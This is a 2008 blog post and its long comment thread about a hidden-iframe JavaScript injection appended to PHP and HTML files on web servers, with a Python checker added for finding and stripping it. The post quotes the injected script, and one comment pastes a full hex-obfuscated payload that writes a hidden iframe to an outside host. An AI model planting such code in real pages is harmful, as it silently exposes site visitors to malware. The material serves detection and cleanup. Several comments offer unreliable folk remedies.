Check your website for a virus attack!

Just discovered this by accident. My server files have been infected with a piece of JavaScript code that sends information to a certain site. This is certainly a first.

How can you check this?

The virus attacks the following files on your server:

  • index.php
  • index.html
  • main.php
  • header.php
  • footer.php

At the end of these files it will insert the following code:

<script language=javascript>status=location;document.write ('<iframe src="hххp://online-channels.info/in.cgi?traf" width=0
height=0 frameborder=0 display:none onLoad="status=defaultStatus;"></iframe>');</script>

Update: if you use WordPress, read how to check WordPress sites.

What does it do?

I can only guess. The code calls a script on the online-channels.info site. It may be sending traffic information. Maybe it is a first case of Internet marketing espionage? Or it may be trying to run some malicious code.

How did it get here?

It could be a security flaw on my hosting server, or a security flaw in WordPress, which is the main script I run on my server.

Whichever way it came in, it ran code that scanned all the files on my server matching the names above and appended the script to the end of each of them.

All the affected files carry the time stamp 29-06-2008 04:59, which is when the attack occurred.

How did I discover it?

By accident. I was looking at the HTTP requests on my site using Firebug and noticed a few 404 Object not found errors. Normally I keep my blog in good shape and these things should not happen.


I then suspected that some of the plugins I use referenced this site. After inspection I found the script inserted into a number of plugins.

I then checked my theme: it was there too, in the index, header and footer. Then I checked the whole WordPress installation, and the script was there as well.

Finally I discovered it was spread out on my whole server.

The lucky thing is that the attacker's site went down, so the 404 error revealed the anomaly.

Who is behind it?

I am still not sure. Here is the domain registration record for online-channels.info:

Domain ID:D23976304-LRMS
Domain Name:ONLINE-CHANNELS.INFO
Created On:29-Feb-2008 23:08:51 UTC
Last Updated On:22-Jun-2008 11:24:52 UTC
Expiration Date:28-Feb-2009 23:08:51 UTC
Sponsoring Registrar:Blog.com Digital Communications Inc. (R315-LRMS)
Status:OK
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:P.O. Box 97
Registrant Street2:Note - All Postal Mails Rejected, visit Privacyprotect.org
Registrant Street3:
Registrant City:Moergestel
Registrant State/Province:
Registrant Postal Code:5066 ZH
Registrant Country:NL
Registrant Phone:+45.36946676

The site is registered somewhere in Denmark under an anonymous name; Blog.com is listed as the sponsoring registrar.

The server IP is 78.109.22.246 and is located in Ukraine.

The trace route times out before reaching the site:

11    86 ms    83 ms    83 ms  tr1-v23.de-fra.datagroup.ua [217.28.250.42]
12   114 ms   107 ms   107 ms  tr1-v454.ua-kiev.datagroup.ua [80.91.160.205]
13   691 ms   611 ms   131 ms  cat65-ge1-2-datagroup.hosting.ua [194.54.91.130]
14     *        *        *     Request timed out.

What can I do?

You should check the files on your server for the code. Check index.php and index.html first, as they are the most likely to have been infected.
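As an added example (not code from the original post), here is a small Python checker that walks a web root, looks in the file names listed above for a trailing script that writes a hidden iframe, strips it, and reports whether the hits share one modification time, the tell-tale the post noted. The domain in the strict pattern is the one quoted in the post; the broader hidden-iframe heuristic, the sample page content and the script name are constructed for this example.

```python
import os
import re
import sys
from collections import Counter
from pathlib import Path

# File names the post says were hit.
TARGET_NAMES = {"index.php", "index.html", "main.php", "header.php", "footer.php"}

# Strict pattern for the injected block quoted in the post: a <script> that starts
# with "status=location;" and document.write()s an iframe pointing at the domain.
INJECT_RE = re.compile(
    r"<script[^>]*>status=location;document\.write\s*\(.*?online-channels\.info.*?</script>",
    re.IGNORECASE | re.DOTALL,
)
# Broader heuristic for variants: a single <script> block that writes an iframe
# with width=0 or height=0 (hidden).  The tempered ".*" keeps the match inside
# one script block so legitimate scripts earlier in the page are not swallowed.
HIDDEN_IFRAME_RE = re.compile(
    r"<script[^>]*>(?:(?!</script>).)*?document\.write\s*\((?:(?!</script>).)*?"
    r"<iframe[^>]*(?:width|height)=['\"]?0\b.*?</script>",
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample content (not taken from any real server); "hxxp" is defanged.
SAMPLE_FOOTER = '<div id="footer">&copy; 2008</div>\n</body>\n</html>\n'
INJECTED = (
    "<script language=javascript>status=location;document.write ('<iframe "
    'src="hxxp://online-channels.info/in.cgi?traf" width=0 height=0 frameborder=0 '
    'display:none onLoad="status=defaultStatus;"></iframe>\');</script>'
)
SAMPLE_INFECTED = SAMPLE_FOOTER + INJECTED


def find_injection(content):
    """Return the injected block if the content carries one, else None."""
    m = INJECT_RE.search(content) or HIDDEN_IFRAME_RE.search(content)
    return m.group(0) if m else None


def clean(content):
    """Strip every matching block and normalise to a single trailing newline."""
    cleaned = HIDDEN_IFRAME_RE.sub("", INJECT_RE.sub("", content))
    return cleaned.rstrip() + "\n"


def scan_tree(root):
    """Map path -> injected snippet for every target file under root that is hit."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.name.lower() in TARGET_NAMES:
            snippet = find_injection(path.read_text(errors="replace"))
            if snippet:
                hits[str(path)] = snippet
    return hits


def common_mtime(paths, bucket_seconds=60):
    """Bucket modification times to the minute and return the most common
    (bucket, count); the post's infected files all shared one time stamp."""
    buckets = Counter(int(os.stat(p).st_mtime) // bucket_seconds * bucket_seconds
                      for p in paths)
    return buckets.most_common(1)[0] if buckets else None


if __name__ == "__main__":
    # Usage: python check_iframe.py /path/to/webroot   (report only; nothing is rewritten)
    hits = scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".")
    for p, snippet in hits.items():
        print(f"{p}: {snippet[:60]}...")
    print(f"{len(hits)} infected file(s); shared mtime bucket: {common_mtime(hits)}")
```

Run it read-only first and compare the reported mtime bucket against your last legitimate deployment before writing any `clean()` output back; a shared timestamp across many unrelated files is the signature described in this post.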

Warn your friends about it.


56 Comments

  1. Korki teenburg.org
    4 weeks ago

    Thanks a lot. Finally I've found an article that really helps me with the virus problem. My WordPress engine was working badly lately and I couldn't even imagine where I'd find the problem, but now it's OK and I'm glad to find such informative articles, and thanks to the kind people who help us.

  2. Alexandr surcentro.com
    4 weeks ago

    Thanks Vladimir! It's great and helpful information for all website owners.

  3. Tony Dung vietnamdhtravel.com
    Jan 11th, 2010

    Help me to check my website for viruses?
    Thanks

    • Dan photodok.com
      Jan 16th, 2010

      Hello!
      You can ask your host company, they can run a scan on your files.

      Otherwise you can download your website, and run a scan on it to check for viruses. It should be able to remove the virus and then you can upload the clean file(s) again.

      However, if there is really a virus on your server, then only the host company can help you; they should also install a firewall.

  4. cs
    Jan 6th, 2010

    One of my friend's sites is infected by the GNU GPL virus, which has added JS at the end of the page.

    Is there any online scanner? Is there any alert system which will send an email whenever a site is infected?

    share & shine.
    cs

  5. georgi facebook.com
    Nov 1st, 2009

    Hi,
    I have been having problems with Facebook for a few days now. It lets me sign on to my account but doesn't allow me to do anything else. Do I need to delete my account? I have a variety of virus checkers such as AVG and COMODO firewall but neither have picked up any issues with the site. I would really appreciate your help as it is starting to bug me.

  6. James pulmotor.com
    Sep 28th, 2009

    I think my site has been hacked as I could not log in to the admin section. Each time I tried, the login redirected to myndomain.com and my browser would freeze. I checked index.php and I found , which I have removed but the problem still remains. Any help would be appreciated.

    • Vladimir prelovac.com
      Sep 28th, 2009

      You could try the exploit scanner plugin mentioned in the article.

      • James pulmotor.com
        Sep 28th, 2009

        I wish I could try the exploit scanner, if only I could log in. My site's wp-admin login is redirecting to myndomain.com and would just freeze the browser.

  7. jenie=) heniperrr.blogspot.com
    Sep 18th, 2009

    I am ssssoo frustrated right now because I am a newbie and I don't really know what to do and WHAT TO LOOK FOR. I don't know what to do. My blogs are infected according to some blogger friends, but I'm not using WordPress... I'm using Blogspot.

    Is it possible that the virus came from those clickables? Or AdSense? Advertisers? I'm afraid to move right now, but I think I'm losing friends, I'm losing opps... and my computer's getting affected. Help me? Anyone?

    What's the best antivirus then? I have AVG, and am going to try and upload McAfee. What of my sites? Do I need to delete and start over?

    • Vladimir prelovac.com
      Sep 18th, 2009

      There is a very slim chance, if any, of having a Blogspot blog infected. Probably it is a false alarm.

  8. Saj fabricuk.com
    Sep 12th, 2009

    Hi,

    We had a case of this iframe virus (cleaned files, changed FTP details, up to now it's good). We also noticed a page drop on Google. My question is, does this virus play a key role in Google page/rank drop issues?

    Thanks
    Saj

  9. sandeep williampen.net
    Aug 21st, 2009

    The common source of infection is FTP usernames and passwords. If your site is infected, change all your FTP account passwords. Look for some JavaScript code or some iframe in index.php, header.php, footer.php.

    Remove that code.

    Everything will be fine.

  10. joseph gormanly trainingacademy
    Jul 26th, 2009

    There is no way of getting rid of this virus, I tried everything, but by accident I discovered: by going into your Plesk and rebooting your website, the virus will disappear for 3 days, then it kicks in again. So I reboot every 2 days to make sure it stays where it is until we can find a guaranteed way of eliminating the virus.

  11. Kumar
    Jul 25th, 2009

    Hi, I have the same problem. What I did is scan all the files on the server, change the FTP details and put some restrictions on all forms.

  12. Anurag Shukla imagine18.com
    Jul 15th, 2009

    Hello, I was having the same problem which all of you faced. I have 19 sites running on different servers and hostings, but all of them got infected. I later found out the way to solve the problem and how we can save ourselves from all those bloody attacks.

    I have written a post about how to save your site from attacks.

    Check here: http://imagine18.com/2009/07/is-your-site-infected-with-iframes-hacks-and-exploits/

    Thanks

  13. Lulu lulucomptuers.com
    Jul 14th, 2009

    I have a couple of sites and the virus got on to all my sites that were in my FileZilla.

    I had to replace the whole folder, or one of the files would just redo all the files and add the following line to my index files.

    Solution: Change all FTP passwords, replace all files on FTP.
    Make sure to back up from here on out!

  14. squidley
    Jul 9th, 2009

    I have multiple sites, Windows and Linux alike. PHP boards, shopping carts, Flash, HTML, etc. Every one of my sites is hosted on GoDaddy. Every one had the index and logon files replaced with a code similar to the one above added. I found it near the header on the HTMLs and at the bottom of the PHP files. All replaced on every site the same day and minute. I have replaced them all 3 times now and there is no end in sight. GoDaddy said "update your PHP. We don't support open source... blah blah." I'm using HTML and Flash as well, ya know... argh. I'm gonna hunt this down until I find the bleeps.

  15. Paul
    May 29th, 2009

    This isn't only a WordPress problem, but a CMS problem.
    I have 14 Joomla sites that have all been infected and have been researching as to how and why.

    Apparently if your site has been hacked it's caused by a sniffer virus on your local PC. Essentially every time you connect to your FTP, the virus reads all of the FTP login credentials and then posts the results to someone somewhere. Then a bot of some kind posts the script to all of your index.php and index.html files. In my particular case it's a different script than the one posted above. It is so incredibly frustrating.

    I do know that if you have been compromised, be sure to clean your PC completely and change all of your FTP passwords. What I am trying to find is a way to scan the files and remove the script from all of the files without having to do it manually... 14 sites = not enough time in my life.

    Can anyone suggest a program or way to scan the files of websites remotely or locally for a specific script and remove them automatically?

    Thanks in advance!

    • MarcoPolo google.com
      Aug 11th, 2009

      I was wondering if you ever fixed your sites. I had the same problem and agree with you about stolen FTP information. I'm using Joomla and WordPress and all sites got hacked with this iframe exploit, and since this code is in so many files, what I did is use search and replace software to scan all the files for the same type of code and delete it. One big problem we face is that if we have exploit scripts in our websites, at the end of the line our sites will be blacklisted from search engines :-(

  16. Babette Jones
    May 24th, 2009

    This sounds a lot like what happens to all of my pages with the name 'index'. Any of my members who use AVG virus protection get an ugly attack message and can't enter my site. The odd thing is that it doesn't seem to cause any problems if you don't have AVG. It seemed to happen about every 4-6 weeks, where it would insert code at the end of these index pages. I seem to have solved it by renaming my index pages 'default'.
    *cheers*

  17. Rahul Shahane dilignet.co.in
    May 22nd, 2009

    Really it is nice information. But I want to know whether there is any option to protect against these infected files automatically?

  18. Rahul Shahane dilignet.co.in
    May 22nd, 2009

    Really it is nice information. But I want to know whether there is any antivirus to protect against these unwanted script-inserted files.

  19. Bishal Adhikary techattitude.com
    May 6th, 2009

    Nice post. My blog is also infected with a malware. This has a script similar to this inserted in many of my plugins, themes, wp-config and so on.

    I have removed the scripts manually many times (by replacing everything with a fresh copy) but the very next day they appear in the same files. What might be the problem? Please help me out.

  20. Grindhouse
    Apr 23rd, 2009

    Happened here too. Like a previous poster, with a GoDaddy site.

    I removed all files. Then uploaded a backup. It too became infected immediately. Gave up, deleted all files, except for a redirect index.php. It takes about 24 hours for it to become infected.

    I just keep going back in and removing the script.

  21. Vladimir prelovac.com
    Apr 15th, 2009

    Hi Ron

    If you use wordpress then check this article http://www.prelovac.com/vladimir/wordpress-security-notes

    Otherwise you'd probably need to hire someone.

  22. ron stone 180degreehealth.com
    Apr 15th, 2009

    Vladimir,

    Can you check or tell me how we can get our website checked for viruses? We don't have a webmaster per se and are getting McAfee "not tested" indications on Google and Yahoo listings.

    Thanks,

    Ron
    817-412-0505

  23. rahul hindlist.com
    Feb 12th, 2009

    O.K. post. Most of them are infected with these leechers. The best way is to check the index.html file on the server regularly. I think this way we can stop the virus attacking.

  24. LouBatt webkoe.net
    Dec 9th, 2008

    Wow, I've the same trouble too.
    My site had some script added by Mr. X like this
    "".

    At first I thought that was my fault from copy-pasting script during coding. I asked my server provider; they use Linux as their operating system and viruses cannot attack their server, as they say. It means the virus runs on the local machine, not attacking the server. Is it?? If it runs on the local machine, how can we detect that? With Symantec?? Ha ha...

  25. Vladimir prelovac.com
    Oct 28th, 2008

    @Lee - I suggest using the exploit scanner plugin - it can go into the database for you.

  26. Lee mambojambojewels.com
    Oct 15th, 2008

    My sites were hacked...

    I just cleaned what seemed to be hundreds of pages on a few of my sites.
    The java code to remove was on most of my sites' index pages.

    I have removed it all (I hope and think).
    But what I'm wondering is, can it get into my MySQL database?

    My hosting company has been very little help. I also cannot access my database, so that's why I am wondering if it can be in there as well (or it could simply be me not remembering my password). If so, will it not just reinfect the index pages again?

  27. terri lovedonesatheart.com
    Sep 18th, 2008

    Hi, I'm lost. I have a few questions; is there anybody I can email my questions to one-to-one?
    Thank you for your time.
    Ter

  28. hasan dhost.info
    Sep 15th, 2008
  29. Planeta Srbija planetasrbija.com
    Sep 15th, 2008

    Well, some pages worked but when I went to HOME - several times,(http://www.prelovac.com/vladimir/) this is what I've got (no joke)! Or you think I'm fooling you around?!

  30. Vladimir prelovac.com
    Sep 15th, 2008

    How did you write that comment then? :)

  31. Planeta Srbija planetasrbija.com
    Sep 15th, 2008

    Oops... where is the hyperlink to the image? Never mind, it's here:

    http://i281.photobucket.com/albums/kk210/planetasrbija/untitled_screen.jpg

  32. Planeta Srbija planetasrbija.com
    Sep 15th, 2008

    It seems that you still have some problems?! Look what I've got when browsing your website:

  33. Louhy
    Jul 25th, 2008

    Thanks for the information.

    Hope this helps with my problem...

    My site got infected with (Exploit.HTML.Iframe.FileDownload).
    How do I identify the file that has been infected? In my site, there are 3 index.html files in separate folders.

  34. TG
    Jul 24th, 2008

    Okay, wanted to add this.
    I noticed that the injection infects the main folder of the server, and goes one directory deep to infect another file:
    /index.html
    and
    foldername/index.html
    but won't go deeper than that. Good for me since many folders have indexes in deep folders.

    I plan in the future to not have index files in the first subfolder if this keeps up.

    What hosting provider do you all use?

  35. TG
    Jul 24th, 2008

    I noticed on my 2 servers, both hosted on GoDaddy, that all my files titled index.php or .html, main, login have been affected by a code injection. To compare notes, here is what mine reads...

    I removed the script start and end from the copy and paste.
    I hope this helps someone out there. Oh, 1 server runs Joomla on it. The other runs HTML and PHP scripts.

    function xy1q48773ca845b80(q48773ca846354){ function q48773ca846b1f () {var q48773ca8472ee=16; return q48773ca8472ee;} return (parseInt(q48773ca846354,q48773ca846b1f()));}function q48773ca847abe(q48773ca8484a8){ var q48773ca8499fc=2; var q48773ca848a5e='';q48773ca84a99e=String.fromCharCode;for(q48773ca84922d=0;q48773ca84922d<q48773ca8484a8.length;q48773ca84922d+=q48773ca8499fc){ q48773ca848a5e+=(q48773ca84a99e(xy1q48773ca845b80(q48773ca8484a8.substr(q48773ca84922d,q48773ca8499fc))));}return q48773ca848a5e;} var q48773ca84b16e='3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E657363617065282027253363253639253636253732253631253664253635253230253733253732253633253364253237253638253734253734253730253361253266253266253734253732253735253635253732253639253665253637253734253666253665253635253733253265253665253635253734253266253733253635253631253732253633253638253265253633253637253639253366253632253631253631253637253639253732253663262532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533362533332533362533392532392532622532372533322533302532372532302537372536392536342537342536382533642533312533312532302536382536352536392536372536382537342533642533352533372533392532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';document.write(q48773ca847abe(q48773ca84b16e));

  36. Gordon mediabass.com
    Jul 21st, 2008

    Using the .htm suffix instead of .html does not stop anything.

  37. Raphael
    Jul 21st, 2008

    I'm seeing this on a Joomla site.

  38. Gordon mediabass.com
    Jul 19th, 2008

    I maintain my business website and have a similar virus. I use a commercial host who denies any virus on my website.
    Nearly all of the index.html and index.php files have the added code. The code is different from the one shown here. This code has a long string of numbers in it.
    I would like to ask if anyone has had success using just index.htm?
    I am going to replace some of my index files with that extension, since some files I cleaned and replaced online were reinfected.

    Thanks, for all the information put on this page.

    I may let you know if changing the html to htm works.

  39. Scam scamtypes.com
    Jul 17th, 2008

    Dave (The Other One) - love that redirect and I totally agree that they need what that page is offering!!

  40. Indika indika.info
    Jul 15th, 2008

    Hi, thanks for the info. I would like to contribute info regarding the registrar Blog.com.

    Almost all new .info domains with Directi (ResellerClub) show the Sponsoring Registrar as Blog.com.

    I have blogged on my site about this if you are interested: http://indika.info/2008/07/15/domain-registrar-changed-to-blogcom/

  41. Lukki
    Jul 11th, 2008

    I have WordPress 2.5.1 installed. I tried replacing the index files (in root, wp-admin, and deleted all of my themes in wp-content and recreated them new) and that seemed to be doing the trick...

    Until this morning, when it came back again. All the index.php files have been injected again with the script, so I will have to do the same thing. Is there any way to prevent modifications to the index.php files? I changed the permissions on those files to 644, but I'm not sure if this is going to fix it permanently.

  42. dhrub priceclub.ae
    Jul 11th, 2008

    Is this website (www.priceclub.ae) infected by a virus...?
    Please confirm for me whether the website is infected by a virus or not...

    pleaseeeeeeeee.

    thanks,
    DHrub

  43. Vladimir prelovac.com
    Jul 11th, 2008

    Removing them from the files is what I did; nothing much is left, I am afraid, except contacting your hosting company and warning them. Also make sure you upgrade everything to the latest versions (WordPress especially).

  44. Lukki
    Jul 10th, 2008

    Hi there, I stumbled upon your site from googling. It seems my website was also injected with these files, although so far I have only found them in the 3 index.php files located in the WordPress directory.

    I was wondering what I should do in this case. If I download those 3 index.php files, remove the scripts and upload them back, will it actually solve the problem? Because I've been looking around and it seems they get injected back within a day. I also wanted to change the passwords on all my accounts, but I don't know if that is going to solve anything.

    Any of you have any ideas? Thanks for the heads up definitely.

  45. Vladimir prelovac.com
    Jul 8th, 2008

    Creative, indeed :)

  46. Dave (The Other One) affiliatebestprograms.com
    Jul 7th, 2008

    Hi Vladimir,

    It's definitely a WordPress related issue. I've had the same problem on several of my blogs and on client blogs I'm hosting. The issue arises from wp-register.php, which is deprecated but redirects to wp-login's register function. Although I see you have user registration turned off here, I would recommend going an extra step and altering your wp-login where you see this:

    case 'register' :
        if ( !get_option('users_can_register') ) {
            wp_redirect('wp-login.php?registration=disabled');
            exit();
        }

    replace it with something like this...

    case 'register' :
        wp_redirect('http://some-other-url-here.com');
        exit();

    I have been very creative with my redirect and send these hackers to a Clickbank offer that they probably need. You can see it by checking the link to my wp-register.php...

    http://www.affiliatebestprograms.com/wp-register.php

    :-) :-)

  47. Vladimir prelovac.com
    Jul 5th, 2008

    No, it is a linux server.

  48. Denigris teamtuxedo.com
    Jul 4th, 2008

    Vladimir are you running windows server?

  49. rjleaman wildapricot.com
    Jul 2nd, 2008

    FYI, just did a tracert on that domain and it went to 203.117.175.107 - looks like a moving target!

  50. rjleaman wildapricot.com
    Jul 2nd, 2008

    Vladimir, thanks so much for this warning - I'll post a note on the Authority Blogger forum about it, to refer people to your post for the details.

  51. Dulce paddsolutions.com
    Jul 2nd, 2008

    Thanks for the heads up. I'll look for those malicious codes in my files tonight. I hope I'm not infected or something.

About Vladimir

Hi! My name is Vladimir Prelovac. I am a computer engineer by profession and an adventurer by state of mind.

"I would love to change the world, I just don't have the source code yet."
